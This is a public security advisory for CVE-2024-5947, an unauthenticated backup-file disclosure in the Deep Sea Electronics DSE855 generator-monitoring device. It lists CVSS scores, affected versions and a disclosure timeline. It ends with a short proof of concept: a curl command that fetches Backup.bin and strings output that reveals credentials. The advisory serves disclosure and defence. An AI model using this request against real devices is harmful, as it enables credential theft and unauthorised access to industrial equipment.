CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
29.8%
Title: Deep Sea Electronics DSE855 Remote Authentication Bypass
Advisory ID: ZSL-2024-5825
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, DoS, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (5/5)
Release Date: 03.07.2024
The DSE855 communications device allows monitoring of a single DSE controller with USB connectivity over a LAN or WAN connection. To achieve this the DSE855 utilises its in-built web server or MODBUS TCP. In order to use over a LAN connection the on-site router must be configured to be accessible from any global location.
The device is vulnerable to configuration disclosure when direct object reference is made to the Backup.bin file using an HTTP GET request. This will enable an attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.
Deep Sea Electronics plc - <https://www.deepseaelectronics.com>
Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0
embOS/IP
[10.11.2023] Vulnerability discovered.
[14.11.2023] Vendor communicated via Trend Micro’s Zero Day Initiative program.
[13.06.2024] ZDI-24-671 advisory released.
[03.07.2024] Public security advisory released.
[18.09.2024] Vendor releases updated firmware to address this issue.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.zerodayinitiative.com/advisories/ZDI-24-671/>
[2] <https://vulners.com/cve/CVE-2024-5947>
[3] <https://nvd.nist.gov/vuln/detail/CVE-2024-5947>
[4] <https://packetstormsecurity.com/files/179342/>
[5] <https://pentest-tools.com/vulnerabilities-exploits/deep-sea-electronics-dse855-authentication-bypass_22935>
[6] <https://www.zerodayinitiative.com/blog/2024/7/25/multiple-vulnerabilities-in-the-deep-sea-electronics-dse855>
[7] <https://www.deepseaelectronics.com/genset/remote-communications-overview-displays/dse855/software>
[03.07.2024] - Initial release
[26.07.2024] - Added reference [4], [5] and [6]
[18.09.2024] - Added vendor status and reference [7]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Deep Sea Electronics DSE855 Remote Authentication Bypass
Vendor: Deep Sea Electronics plc
Product web page: https://www.deepseaelectronics.com
Affected version: Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0
Summary: The DSE855 communications device allows monitoring of a single
DSE controller with USB connectivity over a LAN or WAN connection. To achieve
this the DSE855 utilises its in-built web server or MODBUS TCP. In order
to use over a LAN connection the on-site router must be configured to be
accessible from any global location.
Desc: The device is vulnerable to configuration disclosure when direct object
reference is made to the Backup.bin file using an HTTP GET request. This will
enable an attacker to disclose sensitive information and help her in authentication
bypass, privilege escalation and full system access.
Tested on: embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5825
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php
ZDI ID: ZDI-24-671
ZDI CAN: ZDI-CAN-22679
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability
CVE ID: CVE-2024-5947
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947
10.11.2023
--
$ curl -s -O http://target/Backup.bin
$ strings Backup.bin
DSEB
Admin
Password1234
Tech
Password1234
thricer
scada
rd1234
lokna
xela123
DSE855
</p></body></html>